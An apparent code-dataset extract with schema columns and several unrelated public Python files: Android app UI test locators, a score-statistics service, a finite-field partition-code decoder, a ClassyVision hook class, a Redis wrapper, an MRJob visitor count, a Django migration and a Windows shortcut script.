blob_id
stringlengths
40
40
directory_id
stringlengths
40
40
path
stringlengths
3
281
content_id
stringlengths
40
40
detected_licenses
listlengths
0
57
license_type
stringclasses
2 values
repo_name
stringlengths
6
116
snapshot_id
stringlengths
40
40
revision_id
stringlengths
40
40
branch_name
stringclasses
313 values
visit_date
timestamp[us]
revision_date
timestamp[us]
committer_date
timestamp[us]
github_id
int64
18.2k
668M
star_events_count
int64
0
102k
fork_events_count
int64
0
38.2k
gha_license_id
stringclasses
17 values
gha_event_created_at
timestamp[us]
gha_created_at
timestamp[us]
gha_language
stringclasses
107 values
src_encoding
stringclasses
20 values
language
stringclasses
1 value
is_vendor
bool
2 classes
is_generated
bool
2 classes
length_bytes
int64
4
6.02M
extension
stringclasses
78 values
content
stringlengths
2
6.02M
authors
listlengths
1
1
author
stringlengths
0
175
138d7251e99fd5b8de87425401cfefea55cd6357
84065ee4fb4ebeb8cb2cf1d3f6f385d2c56d787e
/page/__init__.py
359e38e1661042b3715145fd8b364217bb2881c4
[]
no_license
bian-py/app_kefu_code
59ed0bcf247e5dd7b06e0f91cdd9563faa49ce60
2f84a152bdc2c226f2bcb6aabc34f0a5313c094e
refs/heads/master
2023-01-28T11:17:40.984458
2020-12-08T11:07:50
2020-12-08T11:07:50
319,289,680
0
0
null
null
null
null
UTF-8
Python
false
false
7,863
py
from selenium.webdriver.common.by import By # 以下是服务器页面配置信息 fwq_new = By.XPATH, '//*[contains(@content-desc,"添加新的服务器")]' fwq_hand_input = By.XPATH, '//*[contains(@content-desc,"手工输入")]' fwq_scan_code = By.XPATH, '//*[contains(@content-desc,"扫码二维码")]' fwq_input_name = By.XPATH, """//android.view.View[@content-desc="{{ 'server.name' | trans }}"]/../../android.widget.EditText""" fwq_input_URL = By.XPATH, """//android.view.View[@content-desc="{{ 'm.api.url' | trans }}"]/../../android.widget.EditText""" fwq_save_btn = By.XPATH, '//*[contains(@content-desc,"保存")]' fwq_confirm = By.XPATH, '//*[contains(@content-desc,"{}")]' fwq_url_error = By.XPATH, "//*[@content-desc = '无法连接到API']" fwq_swipe_area = By.XPATH, "//android.view.View[@scrollable = 'true']" fwq_back_btn = By.XPATH, "//*[@content-desc = '编辑服务器']/../android.widget.Button" fwq_modify_btn = By.XPATH, '//*[contains(@content-desc,"我的服务器 http://192.168.1.10/kefu/php/app.php?mobile-api")]' \ '/../android.view.View[2]/android.view.View[1]/android.widget.Button' fwq_delete_btn = By.XPATH, '//*[contains(@content-desc,"我的服务器 http://192.168.1.10/kefu/php/app.php?mobile-api")]' \ '/../android.view.View[2]/android.view.View[2]/android.widget.Button' fwq_delete_confirm_btn = By.XPATH, '//*[@content-desc="删除 "]' # 以下是登录页面配置信息 login_username = By.XPATH, '//android.view.View[@content-desc="登陆"]/../../android.widget.EditText' login_password = By.XPATH, '//android.view.View[@content-desc="密码"]/../../android.widget.EditText' login_confirm_btn = By.XPATH, '//android.widget.Button[@content-desc="登陆 "]' login_cancel_btn = By.XPATH, '//android.widget.Button[@content-desc="取消 "]' login_if_success = By.XPATH, '//android.view.View[@content-desc="我的服务器"]/../android.widget.Button' login_logout = By.XPATH, '//android.view.View[contains(@content-desc,"退出")]' login_error_confirm = By.XPATH, '//android.widget.Button[@content-desc="OK "]' login_error_info = By.XPATH, '//android.widget.Button[@content-desc="OK "]/../android.view.View[2]' # 以下是用户列表页面配置信息 def get_user_self_element(username): loc = By.XPATH, '//android.view.View[@content-desc="{}"]'.format(username) return loc user_details_page = By.XPATH, '//android.view.View[@content-desc="用户详细信息"]' user_details_page_back_btn = By.XPATH, '//android.view.View[@content-desc="用户详细信息"]/../android.widget.Button' user_details_send_btn = By.XPATH, '//android.widget.Button[contains(@content-desc,"发送消息 ")]' user_conversation_page = By.XPATH, '//android.view.View[@content-desc="会话"]' user_conversation_page_back_btn = By.XPATH, '//android.view.View[@content-desc="会话"]/../android.widget.Button' user_bottom_btn_talk_list = By.XPATH, '//android.view.View[contains(@content-desc,"会话 会话")]/android.view.View/android.view.View' user_bottom_btn_user_list = By.XPATH, '//android.view.View[contains(@content-desc,"在线用户 在线用户")]/android.view.View/android.view.View' user_talk_input = By.CLASS_NAME, 'android.widget.EditText' user_talk_input_btn = By.XPATH, '//android.widget.EditText/../../android.widget.Button[3]' # 以下是导航栏配置信息 dhl_menu = By.XPATH, '//android.view.View[@content-desc="我的服务器"]/../android.widget.Button' dhl_logout = By.XPATH, '//android.view.View[contains(@content-desc,"退出")]' dhl_user = By.XPATH, '//android.view.View[contains(@content-desc,"退出")]/../android.view.View[1]' dhl_talk = By.XPATH, '//android.view.View[contains(@content-desc,"退出")]/../android.view.View[2]' dhl_history = By.XPATH, '//android.view.View[contains(@content-desc,"退出")]/../android.view.View[3]' dhl_view = By.XPATH, '//android.view.View[contains(@content-desc,"退出")]/../android.view.View[4]' dhl_if_user = By.XPATH, '//android.view.View[@content-desc=" 匿名用户"]' dhl_if_history = By.XPATH, '//android.widget.Button[contains(@content-desc,"搜索 ")]' dhl_if_view = 'org.chromium.webview_shell' dhl_if_view_for_android_6 = 'com.android.browser' dhl_if_logout = By.XPATH, '//*[contains(@content-desc,"添加新的服务器")]' dhl_back_from_talk = By.XPATH, '//android.view.View[contains(@content-desc,"在线用户 在线用户")]/android.view.View/android.view.View' # 以下是会话页面配置信息 def get_talk_list_element(username): loc = By.XPATH, '//android.view.View[@content-desc="{}"]'.format(username) return loc def search_history_msg(msg): loc = By.XPATH, '//android.view.View[@content-desc="{}"]'.format(msg) return loc talk_bottom_btn = By.XPATH, '//android.view.View[contains(@content-desc,"会话 会话")]/android.view.View/android.view.View' talk_back_to_list = By.XPATH, '//android.view.View[@content-desc="会话"]/../android.widget.Button' talk_input = By.CLASS_NAME, 'android.widget.EditText' talk_input_btn = By.XPATH, '//android.widget.EditText/../../android.widget.Button[3]' talk_emoji_btn = By.XPATH, '//android.widget.EditText/../../android.widget.Button[2]' talk_menu_btn = By.XPATH, '//android.widget.EditText/../../android.widget.Button[1]' talk_attachment_btn = By.XPATH, '//android.widget.EditText/../../android.view.View[2]/android.view.View[1]' talk_attachment_for_6_arth = By.ID,'com.android.packageinstaller:id/permission_allow_button' talk_attachment_enter = By.XPATH, '//android.widget.TextView[contains(@text,"文")]' talk_attachment_file_menu = By.XPATH, '//android.widget.ImageButton[@content-desc="显示根目录"]' talk_attachment_download = By.XPATH, "//android.widget.TextView[@text = '下载']" talk_attachment = By.XPATH, "//android.widget.TextView[@text = 'timg.png']" talk_attachment_if = By.XPATH, '//android.view.View[@content-desc="timg.png"]' talk_emoji_select = By.XPATH, '//android.view.View[@content-desc="emot-3"]' talk_emoji_if = By.XPATH, '//android.widget.Image[@content-desc="emot-3"]' talk_menu_invite_user = By.XPATH, '//android.view.View[contains(@content-desc,"邀请会话")]' talk_invite_user = By.XPATH, '//android.view.View[@content-desc="test05"]' talk_invite_user2 = By.XPATH, '//android.view.View[@content-desc="test04"]' talk_invite_if = By.XPATH, '//android.view.View[@content-desc=") 已被邀请参加会谈"]' talk_menu_exit = By.XPATH, '//android.view.View[contains(@content-desc,"离开会话")]' talk_menu_cancel = By.XPATH, '//android.widget.Button[@content-desc="取消 "]' # 以下是历史记录页面配置信息 history_enter = By.XPATH, '//android.view.View[contains(@content-desc,"退出")]/../android.view.View[3]' history_username_input = By.XPATH, '''//android.view.View[@content-desc="{{ 'user.name' | trans }}"]/../../android.widget.EditText''' history_email_input = By.XPATH, '''//android.view.View[@content-desc="{{ 'user.email' | trans }}"]/../../android.widget.EditText''' history_search_btn = By.XPATH, '//android.widget.Button[contains(@content-desc,"搜索 ")]' history_username_if_success = By.XPATH, '//android.view.View[@content-desc="test04, test05"]' history_email_if_success = By.XPATH, '//android.view.View[@content-desc="test04, test03"]' history_date_start_btn = By.XPATH, '''//android.widget.Spinner[@content-desc="{{ 'from.date' | trans }} "]''' history_date_end_btn = By.XPATH, '''//android.widget.Spinner[@content-desc="{{ 'to.date' | trans }} "]''' history_data_start = By.XPATH, '//android.view.View[@content-desc="06 十二月 2020"]' history_data_end = By.XPATH, '//android.view.View[@content-desc="07 十二月 2020"]' history_date_set_btn = By.ID, 'android:id/button1' history_check_if1 = By.XPATH, '//android.view.View[@content-desc="历史会话"]' history_check_if2 = By.XPATH, '//android.view.View[@content-desc="这是test03发给test04的历史信息"]'
[ "334783747@qq.com" ]
334783747@qq.com
6531ca24dc8b784514654a38e162071710663772
5bdaea14397df8fcb07a98f82450d81cdd5d778b
/src/service/statistics/score_statistics_service.py
0d1929c8ce9a233e5a1ec1ee856aa7fdb882dfa5
[]
no_license
RodrigoDeRosa/ConectarSaludServer
5b30c90487a767de122f94e6b81934e7fd641378
8d2602dc22143e85fdfbfcbd883d33c18164cfb4
refs/heads/master
2022-11-20T13:57:42.317373
2020-07-12T18:41:05
2020-07-12T18:41:05
258,001,795
0
0
null
null
null
null
UTF-8
Python
false
false
2,154
py
from datetime import datetime from src.database.daos.consultation_dao import ConsultationDAO class ScoreStatisticsService: @classmethod async def get_statistics(cls, doctor_id: str, from_date: datetime, to_date: datetime, specialty: str): """ Retrieve scoring statistics and adapt for response. """ if doctor_id: score_by_date, detail = await cls.__get_scoring_data(doctor_id, from_date, to_date, specialty) else: score_by_date, detail = await cls.__get_scoring_data(None, from_date, to_date, specialty) # Map to API model date_score_list = [] for date, pair in score_by_date.items(): date_score_list.append( { 'date': date.strftime('%d-%m-%Y'), 'average_score': pair[0] } ) # Return all information return date_score_list, detail @classmethod async def __get_scoring_data(cls, doctor_id, from_date, to_date, specialty): # Retrieve consultations consultations = await ConsultationDAO.finished_consultations(from_date, doctor_id, to_date, specialty) # Group consultations by date score_by_date = dict() for consultation in consultations: consultation_date = datetime.combine(consultation.creation_date.date(), datetime.min.time()) # Calculate new average if consultation_date not in score_by_date: score_by_date[consultation_date] = 1, consultation.score else: count, average = score_by_date[consultation_date] score_by_date[consultation_date] = count + 1, float((average + consultation.score) / (count + 1)) # Get the detail of the score of every consultation detail = [ { 'score': consultation.score, 'opinion': consultation.score_opinion, 'date': consultation.creation_date.strftime('%d-%m-%Y') } for consultation in consultations ] # Return statistic data return score_by_date, detail
[ "rodrigo.derosa@despegar.com" ]
rodrigo.derosa@despegar.com
ee70005f6474b587eee09a190290dc11f5c5439e
4d7b2858eb43506f822e1c3c906bee287186b2a9
/pizza_project/lib/__init__.py
f0acbff325741a8764e1c8595c7766f74b4ceaf7
[]
no_license
byt3-m3/da_pizza_house
c4d98b1c3246aa48256b368a69fad4046bf19691
01d163b511428b442e8d8f97bc4408e6060851db
refs/heads/master
2022-12-08T03:52:02.487557
2020-09-01T21:06:32
2020-09-01T21:06:32
292,047,731
0
0
null
null
null
null
UTF-8
Python
false
false
79
py
from pizza_project.lib.inventory import * from pizza_project.lib.store import *
[ "cbaxtertech@gmail.com" ]
cbaxtertech@gmail.com
366b74b3e20dae7c6b4d55ed70cd676b8ed2c615
7a3ac2f27b2afb16d7e872d07d019b81be597417
/NonAdditivePartition.py
f564c2f374087a55d26293fe03c95accefa7333b
[]
no_license
TropicalMaster/Master
8519cc555a87ef5a9d1076ae3cd987e791215c6e
eb682eff7e13e967ad7a37f5c145895a96da4396
refs/heads/main
2023-04-13T14:35:55.910513
2021-04-18T20:23:14
2021-04-18T20:23:14
359,234,494
0
0
null
null
null
null
UTF-8
Python
false
false
9,038
py
from sympy import * from math import * import copy from finiteField import * from random import randint class PartitionCodes(): def __init__(self, n, k, s, FF): self.n = n self.k = k self.s = s self.FF = FF self.q = FF.q self.p = FF.p # Define I to be any subspace of F_q expressed in exponent representation # of F_q^m element = [0] element.extend([0 for i in range(n-1)]) element = self.FF.invext(element,True) self.I = [element] self.basis = [[i] for i in range(n)] # Create q-Vandermonde matrix of basis (Transposed Moore matrix) # Shifted because [i] = q^i in this case, but still holds self.M = self.qvan(self.basis,self.n) # Matrix inversion self.M_inv = self.FF.inv(copy.deepcopy(self.M)) # Create a q-vandermonde matrix of input elements # a: vector containing alpha element degrees of length n # s: the number of rows in sxn matrix, the range of q-degrees to raise the a elements to def qvan(self,a,s): # Initializing the matrix matrix = [] # Going through the range s for i in range(s): row = [] # Going through each element in the "a" vector for elem in a: if len(elem) != 0: elem = elem[0] # Raising the existing element degrees to q^i (* because "a" elements are given in degrees) elem = (elem * (self.q**(self.s*i))) % self.p row.append([elem]) else: row.append([]) # Append the row to the matrix matrix.append(row) return matrix # Calculate the norm def norm(self,a): deg = int((self.q**(2*self.n) - 1)/(self.q-1)) % self.p if len(a): norm = [(a[0]*deg) % self.p] return norm else: return [] def modifiedBM(self,g): r = 0 L = 0 # Initializing polynomials with q-degree 0 Lambda = [[0],[0]] B = [[0],[0]] while r <= len(g)-1: # Find delta_r as g_r + sum delta_r = g[r].copy() # Sum of Lambda coefficients multiplied with g coefficients for i in range(L): # Check whether g[r-i] is zero if len(g[r-(i+1)]): coeff = [(Lambda[0][i+1] + g[r-(i+1)][0]*self.q**(self.s*(i+1))) % self.p] delta_r = self.FF.add(delta_r,coeff,"+") # Condition if len(delta_r) == 0: B = self.FF.composite([0],B[0],[self.s],B[1]) else: # Copy current Lambda Lambda_temp = copy.deepcopy(Lambda) # Find lambda - delta*x^[1]*B composite = self.FF.composite(delta_r,B[0],[self.s],B[1]) Lambda = self.FF.addComp(Lambda[0],composite[0],Lambda[1],composite[1],"-") if 2*L > r: B = self.FF.composite([0],B[0],[self.s],B[1]) else: # Multiply Lambda_temp with the inverse of delta_r for i in range(len(Lambda_temp[0])): Lambda_temp[0][i] = (Lambda_temp[0][i] - delta_r[0]) % self.p # Define new B polynomial as Lambda_temp B = copy.deepcopy(Lambda_temp) # Increase L L = r + 1 - L r = r + 1 # Negate coefficients because of relation for i in range(len(Lambda[0])): Lambda[0][i] = self.FF.add([],[Lambda[0][i]],"-")[0] return [L, Lambda, B] def partialBM(self,L,Lambda,B,r,g): # Find delta_r as g_r + sum delta_r = [g[r][0]] # Sum of Lambda coefficients multiplied with g coefficients for i in range(L): # Check whether g[r-i] is zero if len(g[r-(i+1)]): coeff = [(Lambda[0][i+1] + g[r-(i+1)][0]*self.q**(self.s*(i+1))) % self.p] delta_r = self.FF.add(delta_r,coeff,"+") # Condition if len(delta_r) == 0: B = self.FF.composite([0],B[0],[self.s],B[1]) else: # Copy current Lambda Lambda_temp = copy.deepcopy(Lambda) # Find lambda - delta*x^[1]*B composite = self.FF.composite(delta_r,B[0],[self.s],B[1]) Lambda = self.FF.addComp(Lambda[0],composite[0],Lambda[1],composite[1],"-") return L,Lambda,B def PartitionEncoding(self,r): # Change received word according to condition if self.norm(r[0]) not in self.I: if (self.k+1) % 2 == 0: r.append(r[0].copy()) else: r.append(self.FF.add([],r[0],"-")) r[0] = [] codeword = self.FF.Codeword(r,self.M) return codeword def PartitionDecoding(self,f): beta = self.FF.Codeword(f,self.M_inv) if beta[self.k+1:self.n] == [[] for i in range(self.k+1,self.n)]: print("Decoded word", beta) return beta # Berlekamp-Massey algorithm on coefficients from k+1 to 2n from beta t0, Lambda, B = self.modifiedBM(beta[self.k+1:self.n]) g = copy.deepcopy(beta) g_sols = [] lambda_vectors = [] if t0 == int((self.n-self.k)/2): t,Lambda,B = self.modifiedBM(g[self.k:self.n]) # Find g_0 g_0 = [] for i in range(1,t+1): coeff = [(Lambda[0][i] + g[self.n-i][0]*self.q**(self.s*i)) % self.p] g_0 = self.FF.add(g_0,coeff,"+") # Check if norm(g[0]-g_0) in I if self.norm(self.FF.add(g[0],g_0,"-")) in self.I: # Add to solution set lambda_vectors.append(Lambda[0].copy()) g_sols.append(copy.deepcopy(beta)) # Create a copy of g, and add g_0 at the end to find BM(g_k+1,g_n+1) g_temp = copy.deepcopy(g) g_temp.append(g[0].copy()) t,Lambda,B = self.modifiedBM(g_temp[self.k+1:self.n+1]) # Find g_k g_k_temp = [] for i in range(1,t): coeff = [(Lambda[0][i] + g[self.k+t-i][0]*self.q**(self.s*i)) % self.p] g_k_temp = self.FF.add(g_k_temp,coeff,"+") g_kt = [(g[self.k+t][0]*self.q**(self.s*(self.n+t))) % self.p] g_k = self.FF.add(g_kt,g_k_temp,"-") g_k = [(g_k[0]-Lambda[0][t]) % self.p] norm = self.norm(self.FF.add(g[self.k],g_k,"-")) # Negate norm element if nks is odd if (self.n*self.k*self.s) % 2 != 0: norm = self.FF.add([],norm,"-") # Check norm(g[k]-g_k) not in I if norm not in self.I: # Negate according to encoding if (self.k+1) % 2 != 0: g_k = self.FF.add([],g_k,"-") # Add to solution set g[self.k] = g_k lambda_vectors.append(Lambda[0].copy()) g_sols.append(g) else: lambda_vectors.append(Lambda[0].copy()) g_sols.append(g) for l in range(len(g_sols)): g = g_sols[l] lambda_vector = lambda_vectors[l] # Check periodicity check = 0 checklimit = 3 for i in range(self.n+checklimit): g_i = [] for j in range(1,t0+1): # Subscript of g is i-j % 2n k = (i-j) % (self.n) if len(g[k]): coeff = [(lambda_vector[j] + g[k][0]*self.q**(j*self.s)) % self.p] g_i = self.FF.add(g_i, coeff,"+") if i < self.n: g[i] = g_i else: if g_i == g[i % self.n]: check += 1 if check == checklimit: # Recover the codeword elements c = [] for i in range(self.n): e_i = [] for j in range(self.n): if len(g[j]): coeff = [(g[j][0] + self.basis[i][0]*self.q**(j*self.s)) % self.p] e_i = self.FF.add(e_i, coeff,"+") c_i = self.FF.add(f[i],e_i,"-") c.append(c_i) print("Decoded codeword ",c,"\n") return c else: if l == 2: print("Decoding Failure") return "Decoding Failure"
[ "noreply@github.com" ]
noreply@github.com
7765cc67a607b9556d7c75470b892c02b3fe5707
f208676788a901f4b66fa0a5809ef5563c1d5471
/classy_vision/hooks/classy_hook.py
ad5c0a900f8643ca8ed1f247fd4a4e113ac37853
[ "MIT" ]
permissive
cwb96/ClassyVision
10e47703ec3989260840efe22db94720122f9e66
597a929b820efdd914cd21672d3947fa9c26d55e
refs/heads/master
2021-02-18T03:35:51.520837
2020-03-05T05:41:24
2020-03-05T05:43:38
null
0
0
null
null
null
null
UTF-8
Python
false
false
3,321
py
#!/usr/bin/env python3 # Copyright (c) Facebook, Inc. and its affiliates. # # This source code is licensed under the MIT license found in the # LICENSE file in the root directory of this source tree. from abc import ABC, abstractmethod from typing import Any, Dict from classy_vision import tasks class ClassyHookState: """Class to store state within instances of ClassyHook. Any serializable data can be stored in the instance's attributes. """ def get_classy_state(self) -> Dict[str, Any]: return self.__dict__ def set_classy_state(self, state_dict: Dict[str, Any]): self.__dict__ = state_dict class ClassyHook(ABC): """Base class for hooks. Hooks allow to inject behavior at different places of the training loop, which are listed below in the chronological order. on_start -> on_phase_start -> on_step -> on_phase_end -> on_end Deriving classes should call ``super().__init__()`` and store any state in ``self.state``. Any state added to this property should be serializable. E.g. - .. code-block:: python class MyHook(ClassyHook): def __init__(self, a, b): super().__init__() self.state.a = [1,2,3] self.state.b = "my_hook" # the following line is not allowed # self.state.my_lambda = lambda x: x^2 """ def __init__(self): self.state = ClassyHookState() def _noop(self, *args, **kwargs) -> None: """Derived classes can set their hook functions to this. This is useful if they want those hook functions to not do anything. """ pass @classmethod def name(cls) -> str: """Returns the name of the class.""" return cls.__name__ @abstractmethod def on_start(self, task: "tasks.ClassyTask") -> None: """Called at the start of training.""" pass @abstractmethod def on_phase_start( self, task: "tasks.ClassyTask", local_variables: Dict[str, Any] ) -> None: """Called at the start of each phase.""" pass @abstractmethod def on_step(self, task: "tasks.ClassyTask") -> None: """Called each time after parameters have been updated by the optimizer.""" pass @abstractmethod def on_phase_end( self, task: "tasks.ClassyTask", local_variables: Dict[str, Any] ) -> None: """Called at the end of each phase (epoch).""" pass @abstractmethod def on_end(self, task: "tasks.ClassyTask") -> None: """Called at the end of training.""" pass def get_classy_state(self) -> Dict[str, Any]: """Get the state of the ClassyHook. The returned state is used for checkpointing. Returns: A state dictionary containing the state of the hook.\ """ return self.state.get_classy_state() def set_classy_state(self, state_dict: Dict[str, Any]) -> None: """Set the state of the ClassyHook. Args: state_dict: The state dictionary. Must be the output of a call to :func:`get_classy_state`. This is used to load the state of the hook from a checkpoint. """ self.state.set_classy_state(state_dict)
[ "facebook-github-bot@users.noreply.github.com" ]
facebook-github-bot@users.noreply.github.com
216caab0b5058a6593ec79eaea114a1cd0914296
33334ad1f60c4a87603e7540925295592a83d936
/devel/_setup_util.py
0a9748349517f3448bae0a7e728ddd41ed0316f3
[]
no_license
ChristianBachla/Mini2
4a1db3061252dbc8ec615c558ceba0631805709e
8b33c7f6979595a34d5131d0a4d24cee1a01a531
refs/heads/master
2020-05-02T05:26:35.978532
2019-03-27T11:54:53
2019-03-27T11:54:53
177,771,744
0
0
null
null
null
null
UTF-8
Python
false
false
87
py
/home/hellden/car_tracker_workspace/devel/.private/catkin_tools_prebuild/_setup_util.py
[ "bjarkehellden@gmail.com" ]
bjarkehellden@gmail.com
99fc086a4b21a32651d739916b777c4fb89ede9e
aa6bfa0ded0d1df8b364938342a94215ec7b3aea
/commons/redis_server.py
8c8de4d3139f7811cccb25ec695fe8804d413901
[]
no_license
bobowang2017/miaosha
48bcc3fca753d9bac7d627c5e548e0aae8e44cb9
80d7bbc74407de451f27033febfacfca81c79ab8
refs/heads/master
2020-04-13T17:42:12.625287
2019-01-11T03:41:20
2019-01-11T03:41:20
163,354,827
0
0
null
null
null
null
UTF-8
Python
false
false
1,619
py
# coding: utf-8 import redis from miaosha.settings import REDIS_CONFIG redis_valid_time = 60 * 60 class RedisClient: @property def redis_client(self): pool = redis.ConnectionPool(host=REDIS_CONFIG['host'], port=REDIS_CONFIG['port']) client = redis.Redis(connection_pool=pool) return client def get_instance(self, prefix, key, delete_cache=False): """根据key获取value(string类型数据操作)""" redis_instance = self.redis_client.get('%s:%s' % (prefix, str(key))) if not redis_instance: return None try: res = eval(redis_instance) except: res = str(redis_instance, encoding='utf-8') if delete_cache: self.redis_client.delete(key) return res def set_instance(self, prefix, key, value, default_valid_time=redis_valid_time): """设置键值对(string类型数据操作)""" return self.redis_client.set('%s:%s' % (prefix, str(key)), value, default_valid_time) def delete(self, prefix, key): """删除键值对(string类型数据操作)""" return self.redis_client.delete('%s:%s' % (prefix, str(key))) def incr_instance(self, prefix, key, amount=1): """根据key自增amount(string类型数据操作)""" return self.redis_client.incr('%s:%s' % (prefix, str(key)), amount) def decr_instance(self, prefix, key, amount=1): """根据key自减amount(string类型数据操作)""" return self.redis_client.decr('%s:%s' % (prefix, str(key)), amount) redis_cli = RedisClient()
[ "anini456123" ]
anini456123
2ba398639002ee6e73bb66baf9147410fb204a72
d03c99cf4e11775ea7c0391623ebf4bba1e9963f
/week4/mostFrequentVisitors.py
c672781de863a6967cc6b81b2ef0ba3d1f8dc11e
[ "MIT" ]
permissive
avinashsc/w261
ce939155bc7662594a5d17129ed96840d251f287
fb0cf538015093496f87f0c07ecdb63db93d0094
refs/heads/master
2020-04-21T19:45:07.023063
2016-12-08T01:48:38
2016-12-08T01:48:38
null
0
0
null
null
null
null
UTF-8
Python
false
false
1,756
py
#!/usr/bin/python from mrjob.job import MRJob from mrjob.step import MRStep from mrjob.protocol import RawValueProtocol import re import operator class mostFrequentVisitors(MRJob): OUTPUT_PROTOCOL = RawValueProtocol URLs = {} def steps(self): return [MRStep( mapper = self.mapper, combiner = self.combiner, reducer_init = self.reducer_init, reducer = self.reducer )] def mapper(self, _, line): data = re.split(",",line) pageID = data[1] custID = data[4] yield pageID,{custID:1} def combiner(self,pageID,visits): allVisits = {} for visit in visits: for custID in visit.keys(): allVisits.setdefault(custID,0) allVisits[custID] += visit[custID] yield pageID,allVisits def reducer_init(self): with open("anonymous-msweb.data", "r") as IF: for line in IF: try: line = line.strip() data = re.split(",",line) URL = data[4] pageID = data[1] self.URLs[pageID] = URL except IndexError: pass def reducer(self,pageID,visits): allVisits = {} for visit in visits: for custID in visit.keys(): allVisits.setdefault(custID,0) allVisits[custID] += visit[custID] custID = max(allVisits.items(), key=operator.itemgetter(1))[0] yield None,self.URLs[pageID]+","+pageID+","+custID+","+str(allVisits[custID]) if __name__ == '__main__': mostFrequentVisitors.run()
[ "jason.sanchez@blueowl.xyz" ]
jason.sanchez@blueowl.xyz
db860d3e1bb35d91e4c7bfda9a9b157a682e6979
f4cab8397849c2972c76d258f81041ef650de472
/blog/migrations/0001_initial.py
b35df6ce2593128dc315f01e4e2d0d8af358fa64
[]
no_license
paner28/mysite
964a8510d15347227ed53309ca0423762764b458
6aa58933dd4ca2821bd5ca602f29bf139997d1cd
refs/heads/main
2023-03-27T13:20:52.620308
2021-03-26T06:35:37
2021-03-26T06:35:37
351,673,700
0
0
null
null
null
null
UTF-8
Python
false
false
2,597
py
# Generated by Django 3.1.7 on 2021-03-26 05:40 from django.db import migrations, models import mdeditor.fields class Migration(migrations.Migration): initial = True dependencies = [ ] operations = [ migrations.CreateModel( name='AnimeModel', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('image', models.TextField(default='https://i.gzn.jp/img/2019/12/14/anime-2020winter/00.png')), ('title', models.CharField(max_length=30)), ('content', models.TextField()), ('hp', models.TextField(default='https://www.tus.ac.jp/')), ('infomation', models.TextField(default='特になし')), ('date', models.DateField(auto_now=True)), ('category', models.CharField(choices=[('Greate', 'イチオシ'), ('Now', '現在'), ('Old', '過去')], max_length=50)), ], ), migrations.CreateModel( name='BlogModel', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('title', models.CharField(max_length=100)), ('content', mdeditor.fields.MDTextField()), ('postdate', models.DateField(auto_now_add=True)), ('editdate', models.DateField(auto_now=True)), ('category', models.CharField(choices=[('math', '数学'), ('program', 'プログラミング'), ('game', 'ゲーム'), ('sports', 'スポーツ'), ('anime', 'アニメ'), ('prime', '素数大富豪'), ('life', '日常'), ('other', 'その他')], max_length=50)), ], ), migrations.CreateModel( name='RamennModel', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('title', models.TextField()), ('postdate', models.DateField(auto_now_add=True)), ('content', models.CharField(max_length=400)), ('picture', models.FileField(upload_to='static/img/Ramenn/')), ], ), migrations.CreateModel( name='SampleModel', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('title', models.CharField(max_length=100)), ('number', models.IntegerField()), ], ), ]
[ "toshi23masa@gmail.com" ]
toshi23masa@gmail.com
45bb8fa9ff7cac2a617fde9225c823719d4b209b
467c8b99507ccabd0d89042fb0510af88d387ec3
/test/1.createShortcut/src/createShortcut.py
21d3f05d98922c6071fe048b7a2fc3c39182bbeb
[]
no_license
Kosuke-Tomita/python
5f5741a59ec097922a3d17decee4012578628dff
8ffad74c912a2a08fe94947e29dee6434d6a1c03
refs/heads/master
2020-07-21T15:47:41.166210
2019-09-08T01:47:38
2019-09-08T01:47:38
206,912,586
0
0
null
null
null
null
UTF-8
Python
false
false
1,717
py
import tkinter from tkinter import messagebox as tkMessageBox from tkinter import filedialog as tkFileDialog import os import sys from pathlib import Path import os.path import win32com.client import datetime class FolderDialog: def __init__(self): pass def showFD(self): root=tkinter.Tk() root.withdraw() iDir='c:/' dirPath=tkFileDialog.askdirectory(initialdir=iDir) return dirPath class ShortCut: def __init__(self,parentFolderPath): self.folderPath = parentFolderPath def createShortCut(self,saveFilePath): shell = win32com.client.Dispatch('WScript.shell') shCut = shell.CreateShortcut(os.path.join(self.folderPath,os.path.basename(saveFilePath)+".lnk")) shCut.TargetPath = saveFilePath shCut.WindowStyle = 1 shCut.IconLocation = saveFilePath shCut.WorkingDirectory = self.folderPath shCut.Save() #ショートカット作成のための親フォルダ取得 fd = FolderDialog() fileFolderPath = fd.showFD() if fileFolderPath in (None,''): sys.exit() #ショートカット保存フォルダ作成 dt = datetime.datetime.now() dtStr = dt.strftime('%Y%m%d_%H%M%S_%f')[:-3] saveFolderPath = os.path.join(os.getcwd(), 'shortcut' + '_' + dtStr) os.mkdir(saveFolderPath) #ショートカット作成 shortCut = ShortCut(saveFolderPath) p = Path(fileFolderPath) for filePath in list(p.iterdir()): shortCut.createShortCut(str(filePath)) # for path in list(p.glob('*')): # message += str(path) + '\n' # if message != '': # tkMessageBox.showinfo('FolderInfo', message) # else: # tkMessageBox.showinfo('FolderInfo', 'NoFile')
[ "54474920+Kosuke-Tomita@users.noreply.github.com" ]
54474920+Kosuke-Tomita@users.noreply.github.com
bb34326efa7e8876f71ebe51e16711253c542128
d925859a64460fb73a065cefe4601701c4858178
/lib/generator/providers/football.py
5c3b5b388e47b51a89451f0c54fb519435e7a079
[ "MIT" ]
permissive
vikkio88/pyDsManager
6493ffe481f5ce2ffc11376cfb3c52195637f4b6
018e08f7db0852f4653c4da6db851551783584a1
refs/heads/master
2021-01-10T01:27:20.853049
2015-12-21T19:14:45
2015-12-21T19:14:45
47,927,280
0
0
null
null
null
null
UTF-8
Python
false
false
167
py
football = { 'clubs': [ 'Football Club', 'Sporting', 'FC', 'United', 'Sport', 'Soccer', 'Football' ] }
[ "vincenzo.ciaccio@timesofmalta.com" ]
vincenzo.ciaccio@timesofmalta.com
35e69a6e70d95cbb060ad0ce9122bcdba0e15a07
36b81a830b04542383adf40b47894960f65bdec6
/chemtools/calculators/dalton.py
1161ca0f8e692918bca26808c0105b1448b4f261
[ "MIT" ]
permissive
lmmentel/chemtools
c3f8f26b3e4baca89988a5f414e33364a09394bc
6d395063a332d76a44919b6b4cf558b8178091dc
refs/heads/master
2023-08-25T12:46:16.500358
2023-08-07T15:47:45
2023-08-07T15:47:45
245,623,218
13
8
MIT
2023-08-30T00:19:17
2020-03-07T11:49:57
Python
UTF-8
Python
false
false
6,528
py
